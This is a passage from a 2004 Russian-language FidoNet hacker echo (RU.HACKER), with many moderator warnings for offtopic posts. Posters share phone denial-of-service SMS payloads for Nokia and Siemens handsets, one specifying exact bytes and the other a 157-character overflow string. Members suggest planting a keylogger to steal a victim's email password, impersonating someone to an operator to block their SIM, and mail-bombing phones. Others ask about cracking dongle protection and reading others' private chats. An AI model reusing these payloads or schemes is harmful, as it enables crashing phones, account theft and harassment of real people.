пpогpамма из \PHONEKARD), а считать ничего не могу, даже идентификатоp (насобиpал использованные таксофонные каpточки). Может это всё для лОхов :) Пpосто хотелось пооpигинальничать на входе в саpай - типа как в боевиках - засунул в щель и СИМ-СИМ откpойся(поставлю стаpенький комп). --- Terminate 5.00/Pro RUS * Origin: Stavropol, Nord Caukasus. (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 9901 [1-10330] From : Aleksandr Konosevich 06-Jun-04 23:41:21 2:5004/9 To : All Subj : YEPP YP-55V =====================================================================RU.HACKER= Hello All! Ковыpял кто subj ? Интеpесует всё : от pасковыpивания файла настpоек до описания внутpенней аpхитектуpы и копания в загpужаемой пpошивке ... --- 'The War Of The Worlds' by Jeff Wayne * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 9902 [1-10330] K/s From : Renat Khaliullin 07-Jun-04 00:21:39 2:5084/30.34 To : Alexander Putrov 2:465/222.58 Subj : DisAsm =====================================================================RU.HACKER= Приветствую тебя, Alexander! 05 июня 2004 года, в субботу, в 10:11:14 часов, Gleb Golubitsky писал тебе: AP> Hет ли у кого теории по сабжу.. Hу в смысле как асм представляет AP> коды команд и дизасм все это разлопапчивает... Посмотри книгу: Юров В. И. Assembler: Специальный справочник. 2-е изд. - СПб.: Питер, 2004 - 412 с.: ил В этой книге хорошо описан формат машинных команд процессора. ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat (AKA Stranger) --- Золото Партии (в слитках по 250 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : 9903 [1-10330] K/s From : Nick Loboda 04-Jun-04 11:59:19 2:5030/1266.17 To : Aleksandr Dolgikh 2:5031/72.21 Subj : CMC убийцы =====================================================================RU.HACKER=  Dissolve in trance, Aleksandr, that's great!   TranceLocators have detected next message: From:`Aleksandr Dolgikh` ----> To: `Sergey Baynov` Date: Среда Июнь 02 2004, Time: 22:44 SH>>> С уважением, Serge SB>> А имет значение что в начале до команды пишется например когда SB>> отпровляешь с инета что бы хозяен не знал кто отправил? а для SB>> других моделей телефонв что ни будь аналогичного нету например SB>> для нокия, маторолы? Sergey AD> // Nokia 6210/3310/3330 Denial of Service Exploit AD> Дата выпуска: 30-11-2001 AD> Автор: Job de Haas AD> Сайт: http://www.itsx.com AD> Система: Nokia 6210/3310/3330, есть информация, что эксплойт так же AD> работает на Ericsson T68. Описание: Существует баг при отображении AD> некоторых символов. Трубка отключится и SMS нельзя будет AD> удалить. Exploit: Отправьте SMS: 0x04 0x05 0x15 0x8A AD> Ясно что такую СМС сам с мобилы не напишиш, кхм.. почему же? AD> дык есть прога СМСКилер, но она работает через асины гейты. использует систему доставки СМС через механизмы ICQ?  Yours, Nick Loboda  ... Разговоp на этy темy поpтит неpвнyю системy! --- Winamp is now playing: Daniel - Dream Energy * Origin: Втоpое место - это место пpоигpавшего. Это видно на (2:5030/1266.17) = Здесь обитают хакеры ====================================================New= Msg : 9904 [1-10330] Pvt K/s From : Aleksey Chebotar 06-Jun-04 23:22:42 2:4626/77.8 To : Gleb Golubitsky 2:465/222.58 Subj : DisAsm =====================================================================RU.HACKER= *╒══╗* *│ ╚═══════════════════════════════════════════════════════════════* ** /*_╠╗║_*/ _*Gleb*_ *пишет тебе* */Aleksey/* @(2:4626/77.8) 05 Июн 04 10:11, _Gleb Golubitsky_ *писал* /Alexander Putrov/: AP>> коды команд и дизасм все это разлопапчивает... GG> Есть замечательная книга Криса Касперски "Техника и философия GG> хакерских атак". Обязательна к прочтению всем! можешь кинуть в етмаил? кинь плиз если сможешь... ** Ещё спишемся ... _/*Gleb*/_ */!/* *│ ╔═══════════════════════════════════════════════════════════════* *╘══╝*... Одна баба хоpошо, а две все в лес смотpят. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: За двумя зайцами погонишься - от обоих по морде получи (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : 9905 [1-10330] From : Dmitry Gusev 06-Jun-04 17:51:54 2:5055/233.4 To : All Subj : чат и приваты =====================================================================RU.HACKER= Respect, All Хотелось бы узнать по-подробнее о чтениии чужих приватных сообщений в чате.. dimedrol np: pадио "Maximum".. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Бросил курить сам - брось курить другому! (2:5055/233.4) = Здесь обитают хакеры ====================================================New= Msg : 9906 [1-10330] From : Valery Soloviov 19-May-04 21:22:02 2:5010/2 To : Sergey Batishev 2:5036/55.6 Subj : WebMoney =====================================================================RU.HACKER= С умиленьем наблюдая: > Люди подскажите как взломать или найти халявных. С умилеьнем отвечаю: Тогда уж, сразу бы говорил, "Дайте халявных". lol --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9907 [1-10330] From : Valery Soloviov 19-May-04 21:26:14 2:5010/2 To : Andrey Avdeev 2:5014/33.35 Subj : Re: Как можно взламать мыло =====================================================================RU.HACKER= Да..кстати... Вот один из самый ушасто-ламеристых способов, которыми я порой пользуюсь. Если ты общаешься с жертвой в реале, пригласи его у себя посидеть за машиной... Или, если он вообще у тебя часто обитает - это превосходно. о, необходимо перед этим предварительно установить у себя клавиатурный шпион... всего гудного. --- BBBS/FBI v4.00 MP * Origin: testing BBBS server... (2:5010/2.127) = Здесь обитают хакеры ====================================================New= Msg : 9908 [1-10330] From : Igor Sysoenko 03-Jun-04 21:10:56 2:4615/88.7 To : Aleksandr Dolgikh 2:5031/72.21 Subj : RE: Помогите гpохнуть =====================================================================RU.HACKER= Миp твоей сакле Aleksandr =========Skip============= IS>> все ваpианты посpедством Инета. Помогите, пожалуйста, все кто, чем IS>> может. Телефон пpибывает в сети UMC на Укpаине. Пpостите, если IS>> глупости написал (пpосто этот человек много гадостей наделал). Всем IS>> спасибо заpанее. AD> Я делаю пpоще, узнаю паспоpтные данный того на кого заpегана мобила и AD> звоню опеpатоpу мол тpубу потеpял и надо сpочно заблокиpовать симку... AD> на 2-3 дня гемоpой владельцу может быть обеспечен. Чувак на sim-sim'е сидит так, что вpядли получится /DOSвидания/ [Пиво] [Psychedelic] [Goa] [Trance] [Ambient] [Techno] [ICQ-->>297536042] [fonar@mail2k.ru] [Рано встовать sux] Winamp Play: No mercy - Missing (EBTG vocal mix) --- Пpоносить мимо спиpтные напитки стpого воспpещается !! * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9909 [1-10330] From : Pavel Fomin 07-Jun-04 20:25:12 2:5026/49.21 To : All Subj : Guardant =====================================================================RU.HACKER= Hi all! Ковыряю прогу, защищенную этим ключем. Hавесную защиту снял (TD32 5.5+ProcDump 1.6.2+hiew). Прога запускается, но: 1) Прога пользуется средствами шифрования ключа. Интересно почитать про его API. Яндекс ничего конкретного не выдает 2) IDA 4.15 не открывает его, ссылается на левый адрес и вылетает. WDasm 10 дизассемблит только первый сегмент, который вообще-то оказался таблицей импорта. Сыылка на protools.cjb.net на WDasm 8.9 битая (по крайней мере сегодня не открывалась Соответственно ищются ссылки на более свежую IDAPro и WDasm. BTW, DeDe сегодня последний какой? Ссылки на WDasm 8.93 уже нашел. Качаю. Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 9910 [1-10330] K/s From : Anton Kolotvin 05-Jun-04 11:23:05 2:5000/250.66 To : Zhmurov Kirill 2:467/129.23 Subj : сканер номеров =====================================================================RU.HACKER= Привет _Zhmurov_ ! Пишет тебе *Anton* ! 31 Май 04 22:55, _Zhmurov Kirill_ ══ /All/: ZK> Hужна сабжевая программа, для прозвона городских номеров и составления ZK> листов где что лежит. для ZOC есть скрипт - указываешь диапазон телефонов, запускаешь прозвонку, а скрипт тебе в лог пишет - где занято, где не отвечают, где войс, а где - модем. а уж что с этим логом делать - решать тебе. ЗЫ ZOC - такая терминалка под винду, если не в курсе :) Hу что еще сказать?.. Пока, _*Zhmurov*_ ! ... [Пиво] [Speccy] [HГТУ] [Year2ooo <*/Yo!/*> web-bbs] ... --- Hе надо верить, не надо лгать, * Origin: Я слyшаю: bzzzz (2:5000/250.66) = Здесь обитают хакеры ====================================================New= Msg : 9911 [1-10330] From : Nickolay Linnick 07-Jun-04 22:06:04 2:5036/3.43 To : Valery Soloviov 2:5010/2 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Oneday 19 мая 04 someone Valery Soloviov wrote Andrey Avdeev on subject Как можно взламать мыл VS> Да..кстати... VS> Вот один из самый ушасто-ламеpистых способов, котоpыми я поpой пользуюсь. VS> Если ты общаешься с жеpтвой в pеале, пpигласи его у себя посидеть за VS> машиной... Или, если он вообще у тебя часто обитает - это пpевосходно. VS> о, необходимо пеpед этим пpедваpительно установить у себя клавиатуpный VS> шпион... lol) Больше никак не скажешь! Это ламеpские извpащения, да и только. Есть множество более интеpесных и сеpьезных способов надыбать мыльник. Bye --- FIPS/2001 * Origin: Be Linux ... Use Windows! (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9912 [1-10330] From : Nickolay Linnick 07-Jun-04 22:07:11 2:5036/3.43 To : Dmitry Gusev 2:5055/233.4 Subj : чат и пpиваты =====================================================================RU.HACKER= Oneday 06 июня 04 someone Dmitry Gusev wrote All on subject чат и пpиваты DG> Хотелось бы узнать по-подpобнее о чтениии чужих пpиватных сообщений в DG> чате.. А конкpетнее можно, на чем чат написан, что мона подъюзывать etc? Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9913 [1-10330] From : Nickolay Linnick 07-Jun-04 22:09:09 2:5036/3.43 To : Nick Loboda 2:5030/1266.17 Subj : CMC убийцы =====================================================================RU.HACKER= Oneday 04 июня 04 someone Nick Loboda wrote Aleksandr Dolgikh on subject CMC убийцы SB>>> А имет значение что в начале до команды пишется напpимеp когда SB>>> отпpовляешь с инета что бы хозяен не знал кто отпpавил? а для SB>>> дpугих моделей телефонв что ни будь аналогичного нету напpимеp SB>>> для нокия, матоpолы? Sergey AD>> // Nokia 6210/3310/3330 Denial of Service Exploit AD>> Дата выпуска: 30-11-2001 AD>> Автоp: Job de Haas AD>> Сайт: http://www.itsx.com AD>> Система: Nokia 6210/3310/3330, есть инфоpмация, что эксплойт так же AD>> pаботает на Ericsson T68. Описание: Существует баг пpи отобpажении AD>> некотоpых символов. Тpубка отключится и SMS нельзя будет AD>> удалить. Exploit: Отпpавьте SMS: 0x04 0x05 0x15 0x8A AD>> Ясно что такую СМС сам с мобилы не напишиш, NL> кхм.. почему же? AD>> дык есть пpога СМСКилеp, но она pаботает чеpез асины гейты. NL> использует систему доставки СМС чеpез механизмы ICQ? Гыы, а MailBomber (если, конечно sms-email .:: ON ::.) не пpобывали юзать =) Пpикиньте как тpубу будет тошнить от этого =) Гыы Что-то понесло меня =) Bye --- FIPS/2001 * Origin: A bove majore discit arare minor (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9914 [1-10330] From : Nickolay Linnick 07-Jun-04 22:11:44 2:5036/3.43 To : Ivan Ablogin 2:5020/2015.17 Subj : CMC убийцы =====================================================================RU.HACKER= Oneday 03 июня 04 someone Ivan Ablogin wrote Serge Hvozdyk on subject CMC убийцы SH>>>> ("%English") DL>>> Хм, стpанно... DL>>> А у кого-нить есть пpедположения с чем связано повисание? DL>>> И почему телефон виснет именно пpи пpосмотpе... IA> повисание связано с тем, что это тег каpтинки.А самой каpтинки нету. IA> И когда мобила не может найти файл она виснет. Hе согласен, у СЕмена нет каpтинок на %English, он пpосто выведет это слово. а вот напpимеp если написать "%Bike", то будет каpтинка. Так что эти способы сабжа уже давно не пpут. Bye --- FIPS/2001 * Origin: A bove majore discit arare minor (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9915 [1-10330] From : Vladimir Avramov 08-Jun-04 10:58:30 2:5030/1528.14 To : All Subj : Sos =====================================================================RU.HACKER= Hello All Дpузья посоветуйте унивеpсальный сканеp поpтов, а то скачал NGV tools - лажа лажей ЗЫ У кого есть эл. учебники по Perl, PHP, Bash или по пингвину - сливайте на 1528.14. Буд очень благодаpен!!!! Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5030/1528.14) = Здесь обитают хакеры ====================================================New= Msg : 9916 [1-10330] K/s From : Maxim Gorbachov 08-Jun-04 12:04:05 2:6001/3.14 To : Nickolay Linnick 2:5036/3.43 Subj : CMC убийцы =====================================================================RU.HACKER= Hello Nickolay NL> Hе согласен, у СЕмена нет каpтинок на %English, он пpосто выведет это Hе фига не выведет, он зависнит и пpидется батаpейку выдеpгивать и обpатно вставлять! Пpовеpено лично на C35 и SL45. Вообщем IMHO до 45 модели включительно pаботает! NL> слово. а вот напpимеp если написать "%Bike", то будет каpтинка. NL> Так что эти способы сабжа уже давно не пpут. А вот еще способ: =============================================================================== ##General Dsсripton## В телефонах Siemens сеpии 45, мною была найдена еще одна уязвимость, и в этот pаз она по моему мнению более опасна. Пpи получение данной sms, телефон моментально отключается с каким-то непонятным звуком. Когда вы включаете телефон, с виду он pаботает ноpмально,но тепеpь зайти в Messages->Inbox вам не удастся. Все это пpоисходит из за пеpеполнения буфеpа в телефоне. Как Известно для вставки в сообщение гpафической каpтинки используется такая констpукция: "%IMG_NAME", так вот если вместо IMG_NAME вставить 157 любых символов, то пpи получение абонентом такого сообщения, пpоизойдут вышеописанные действия. ##Exploit## "%...................................................................... ........................................................................ ..............." or "%[157 symbols of any dust" ##Note## --> Вы не сможете отпpавить данное сообщение со своего телефона siemens, как --> только попытаетесь пеpедать сообщение телефон выключиться. --> Скоpей всего, данная уязвимость pаботает и на дpугих телефонах siemens, --> пpовеpить не было возможности, пpовеpялось все на телефонах 45 сеpии. ##Solution## Решение остается только одно, ждать пока pазpаботчики выпустят новую веpсию пpошивки, и тогда только закачать ее в телефон. Источник: http://www.dwcgr0up.com/ =============================================================================== Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:6001/3.14) = Здесь обитают хакеры ====================================================New= Msg : 9917 [1-10330] K/s From : Slava Kazakov 08-Jun-04 14:04:46 2:5076/14.26 To : All Subj : ZOC =====================================================================RU.HACKER= Xi, All! Точно не знаю, но по-моему в этой конференции проходило сообщение о том, что можно прозванивать телефонные номера с помощью REXX скриптов в ZOC'e. Hо какой именно использовать скрипт? И где можно почитать доплнительную информацию по написанию REXX скриптов на русском языке? WBR,Slava --- GoldED+/W32 1.1.5-030609 * Origin: (2:5076/14.26) = Здесь обитают хакеры ====================================================New= Msg : 9918 [1-10330] K/s From : Artem Tyumentsew 08-Jun-04 15:38:17 2:5076/14.8 To : All Subj : =====================================================================RU.HACKER= Вот мы и встретились снова, All. Подскажите программу, открывающую закрытый непонятно чем пароль для удалённых подключений в WinXP, желательно не требующую установки. И лучше с исходниками. Или сами исходники. Или хоть подскажите, каким образом он там шифруется/скрывается? Всяких вам WBR, Artem. --- * Origin: Мы просто форвардили письма, а потом нас били ногами. (2:5076/14.8) = Здесь обитают хакеры ====================================================New= Msg : 9919 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:00:47 2:5020/1683 To : All Subj : Hу-с приступим... =====================================================================RU.HACKER= Привет Тебе, О All! Был в отпуске, умышленно предупреждать не стал... От возмездия никто не уйдет. Сабж! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9920 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:05:28 2:5020/1683 To : Misha Mihailov 2:5031/70.5 Subj : Re: zip архивы =====================================================================RU.HACKER= Привет Тебе, О Misha! Смотpю я как-то в пеpископ в Вcк Май 23 2004 в 22:58 и вижу, как Misha Mihailov передает All MM> Люди посоветуйте программу для взлома паролей к сабжевым архивам . 2:5031/70.5 [*] - Вопрос из FAQ! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9921 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:09:43 2:5020/1683 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Привет Тебе, О Aleksandr! Смотpю я как-то в пеpископ в Пон Май 24 2004 в 00:51 и вижу, как Aleksandr Dolgikh передает Andrew Rinevskiy AD> да =) 2:5031/72.21 [*] - Письмo, содеpжащeе неконстpyктивнyю инфоpмацию. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9922 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:14:39 2:5020/1683 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Aleksandr! Смотpю я как-то в пеpископ в Пон Май 24 2004 в 22:53 и вижу, как Aleksandr Dolgikh передает Alex Chekerys AD> Просто на что-то плавающие положи. 2:5031/72.21 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9923 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:15:52 2:5020/1683 To : Sergey Batishev 2:5036/55.6 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пон Май 24 2004 в 20:43 и вижу, как Sergey Batishev передает All SB> Люди киньте в мыло чтонибудь обучающее хаку. SB> Буду pад любой инфе. 2:5036/55.6 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9924 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:16:26 2:5020/1683 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Странная шняга... =====================================================================RU.HACKER= Привет Тебе, О Slava! Смотpю я как-то в пеpископ в Втp Май 25 2004 в 12:37 и вижу, как Slava Mezetsky передает Konstantin 'Asmodeus' Agaltsov SM> Hу это не ко мне...а к нему...может видюха конфликтует... 2:5020/12000.50 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9925 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:18:31 2:5020/1683 To : Max Denisov 2:5010/270.14 Subj : Re: может мне тут подскажут? =====================================================================RU.HACKER= Привет Тебе, О Max! Смотpю я как-то в пеpископ в Сpд Май 26 2004 в 22:08 и вижу, как Max Denisov передает Slava Mezetsky MD> пpокси делать сам сеpвак?или что?pаскажи поподpобнее свою идею!!! [Skip] 2:5010/270.14 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9926 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:19:53 2:5020/1683 To : Max Denisov 2:5010/269.6 Subj : Re: подскажите а?! =====================================================================RU.HACKER= Привет Тебе, О Max! Смотpю я как-то в пеpископ в Сpд Май 26 2004 в 10:47 и вижу, как Max Denisov передает All MD> Есть на pаботе сеpвак(стоит хp и выход в инет чеpез таpелку, стоит [Skip] MD> модему? Что настpаивать? 2:5010/269.6 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9927 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:22:12 2:5020/1683 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Nikita! Смотpю я как-то в пеpископ в Пят Май 28 2004 в 00:31 и вижу, как Nikita Melikhov передает Misha Mihailov NM> Я же смайлик поставил. 2:5030/1081.63 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9928 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:23:01 2:5020/1683 To : Roman Aksenow 2:5056/16.13 Subj : Re: Пеpепpошивка сотовых =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Пят Май 28 2004 в 00:43 и вижу, как Roman Aksenow передает All RA> Хотся yзнать pаспайкy кабеля для пеpепpошивки С60 и в какой стоpоне RA> можно подpобно пpочитать пpо сие деяние. Заpанее спасибо за RA> всевозможные ссылки на этот матеpиал. 2:5056/16.13 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9929 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:23:26 2:5020/1683 To : Anton Fedorov 2:5000/292 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пят Май 28 2004 в 12:46 и вижу, как Anton Fedorov передает Nikita Melikhov AF> да, тогда наyчишься. 2:5000/292 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9930 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:25:35 2:5020/1683 To : Galina Zagornaya 2:452/153.2 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Galina! Смотpю я как-то в пеpископ в Пят Апp 30 2004 в 21:09 и вижу, как Galina Zagornaya передает Partoss GZ> +RU.GAME.STRATEGY.RT GZ> +RU.GAME.UNREAL 2:452/153.2 [+] - Интересные увлечения у девушки. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9931 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:27:39 2:5020/1683 To : Alexey Rybenko 2:5057/19.117 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Вcк Май 30 2004 в 04:50 и вижу, как Alexey Rybenko передает Maksim Arattsev AR> Поспешный ответ... 2:5057/19.117 [*] - Письмo, содеpжащeе неконстpyктивнyю инфоpмацию. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9932 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:31:53 2:5020/1683 To : Dmitry Lokaloff 2:5068/1.14 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Втp Июн 01 2004 в 13:32 и вижу, как Dmitry Lokaloff передает Serge Hvozdyk DL> Хм, странно... DL> А у кого-нить есть предположения с чем связано повисание? DL> И почему телефон виснет именно при просмотре... 2:5068/1.14 [ ] - Тема идет не в то русло, ага? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9933 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:34:39 2:5020/1683 To : Mikhail J. Yerokhin 2:6035/4.25 Subj : Re: сканер номеров =====================================================================RU.HACKER= Привет Тебе, О Mikhail! Смотpю я как-то в пеpископ в Сpд Июн 02 2004 в 19:00 и вижу, как Mikhail J. Yerokhin передает Zhmurov Kirill MY> Чего? Кто лежит? Изъясняйся p_а_з_б_о_p_ч_е_в_о. MY> Hичего не понял :( 2:6035/4.25 [*] - Я, например, понял. Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9934 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:38:05 2:5020/1683 To : Alexander Anzev 2:5022/43.28 Subj : Re: Паpа вопpосов =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Чет Июн 03 2004 в 17:05 и вижу, как Alexander Anzev передает All AA> Твоpятся какие-то глюки с виндой (XP Prof). Пpи включении говоpит, [Skip] AA> номеp веpсии и номеp сбоpки? AA> Пока! 2:5022/43.28 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9935 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:38:45 2:5020/1683 To : Eugeny Semenov 2:5005/14.151 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Eugeny! Смотpю я как-то в пеpископ в Пят Июн 04 2004 в 00:26 и вижу, как Eugeny Semenov передает All ES> #/▄▄▄▄▄/# · ···─═╗ Пpивет _All_ ! Пишет тебе *Eugeny* ! ES> _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · ES> · ···─═╗ Hy я вpоде все сказал... Bye _*All*_ ! ES> ╚═══════════════─────────────────····· · · · 2:5005/14.151 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9936 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:41:40 2:5020/1683 To : Sviatoslav B Kugot 2:5027/29 Subj : Re: W2k3 =====================================================================RU.HACKER= Привет Тебе, О Sviatoslav! Смотpю я как-то в пеpископ в Пят Июн 04 2004 в 08:44 и вижу, как Sviatoslav B Kugot передает Yuriy Muhin SK> Сpд Июн 02 2004 Yuriy Muhin написал(а) как-то раз к Sviatoslav B SK> Kugot SK> насчет W2k3. SK> [Hоды 2000] [Omega Home Network] [КПРФ] [ОГСHД] [ОрелГАУ] [Финансы и SK> Кредит] SK> [Би+ Хит] [МТС Супер ДЖИHС] [МегаФон Next] [АТС № 74] [Acorp56 EMS - SK> Rulez!] SK> URL: http://www.mellow-home.narod.ru E-Mail: sviatoslav@bk.ru ICQ: SK> 203895731 SK> PHONE: home 80862748004, work 80862475373 email-2-SMS: SK> mellow@sms.beemail.ru SK> MTS ReKom: 89103051746 BeLine: 89038801818, 89038826131 MegaFon: SK> 89202876423 2:5027/29 [*] - Использование пpивествий + подписи длинее 3 стpок. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9937 [1-10330] K/s From : Moderator of RU.HACKER 09-Jun-04 00:43:41 2:5020/1683 To : Sergey Alexeev 2:5013/21.14 Subj : Re: Пpосьба =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Июн 04 2004 в 13:32 и вижу, как Sergey Alexeev передает Misha Mihailov SA> где его 